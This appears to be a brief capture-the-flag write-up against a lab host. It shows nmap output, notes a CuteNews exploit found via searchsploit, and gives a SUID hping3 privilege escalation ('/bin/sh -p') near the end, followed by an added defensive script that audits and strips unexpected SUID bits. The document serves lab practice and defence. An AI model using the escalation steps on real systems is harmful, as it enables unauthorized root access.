Kali: 192.168.111.111
Target: 192.168.111.147
Port scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04d06ec4ba4a315a6fb3eeb81bed5ab7 (RSA)
| 256 24b3df010bcac2ab2ee949b058086afa (ECDSA)
|_ 256 6ac4356a7a1e7e51855b815c7c744984 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: 759585A56089DB516D1FBBBE5A8EEA57
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open http nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: UTF8(USER) STLS IMPLEMENTATION(Courier Mail Server) UIDL PIPELINING USER TOP LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after: 2021-09-17T16:28:06
| MD5: 5ee240c866d1b32771e6085af50b7e28
|_SHA-1: 28a3acc086a7cd648f0978fa179270320eccb154
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: UTF8(USER) IMPLEMENTATION(Courier Mail Server) UIDL PIPELINING USER TOP LOGIN-DELAY(10)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after: 2021-09-17T16:28:06
| MD5: 5ee240c866d1b32771e6085af50b7e28
|_SHA-1: 28a3acc086a7cd648f0978fa179270320eccb154
Directory brute-forcing
Visit the web site
README.md reveals the CMS version
Search searchsploit for vulnerabilities in this CMS
Delete all /CuteNews paths
Run the Python script
find / -perm -u=s 2> /dev/null
Privilege escalation: https://gtfobins.github.io/gtfobins/hping3/#suid
/usr/sbin/hping3
/bin/sh -p
Get the flag
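The root step above worked only because hping3 carried a setuid bit it does not need. The script below is an added defensive example, not part of this write-up: it lists SUID binaries under a root the way the find command above does, reports any not on an allowlist (assumed to be a plain file with one absolute path per line), and strips the bit from the offender. The demo tree it builds is constructed to mirror the target's layout.

```shell
#!/bin/sh
# Added example: audit SUID binaries against an allowlist and remediate.
# Assumption: ALLOWLIST is a plain file, one absolute path per line.

# audit_suid ROOT ALLOWLIST: print every SUID file under ROOT whose path
# (relative to ROOT) is not listed in ALLOWLIST. Prints nothing when clean.
audit_suid() {
    root="$1"
    allow="$2"
    # -perm -4000 is the same filter as find / -perm -u=s in the write-up
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        rel="${path#"$root"}"
        grep -qxF -- "$rel" "$allow" || printf '%s\n' "$path"
    done
}

# strip_suid FILE: remediation, drop the setuid bit from an unexpected binary.
strip_suid() {
    chmod u-s "$1"
}

# Constructed fixture so the script runs offline (no real system files touched).
make_demo_tree() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/usr/sbin" "$tmp/usr/bin"
    : > "$tmp/usr/bin/passwd";  chmod 4755 "$tmp/usr/bin/passwd"  # expected SUID
    : > "$tmp/usr/sbin/hping3"; chmod 4755 "$tmp/usr/sbin/hping3" # unexpected SUID
    : > "$tmp/usr/bin/ls";      chmod 0755 "$tmp/usr/bin/ls"      # not SUID
    printf '/usr/bin/passwd\n' > "$tmp/allow.txt"
    printf '%s\n' "$tmp"
}

demo=$(make_demo_tree)
echo "Unexpected SUID binaries under $demo:"
audit_suid "$demo" "$demo/allow.txt"
rm -rf "$demo"
```

On a live host, run audit_suid / against a baseline captured right after installation and treat every new entry as a finding to explain or remediate.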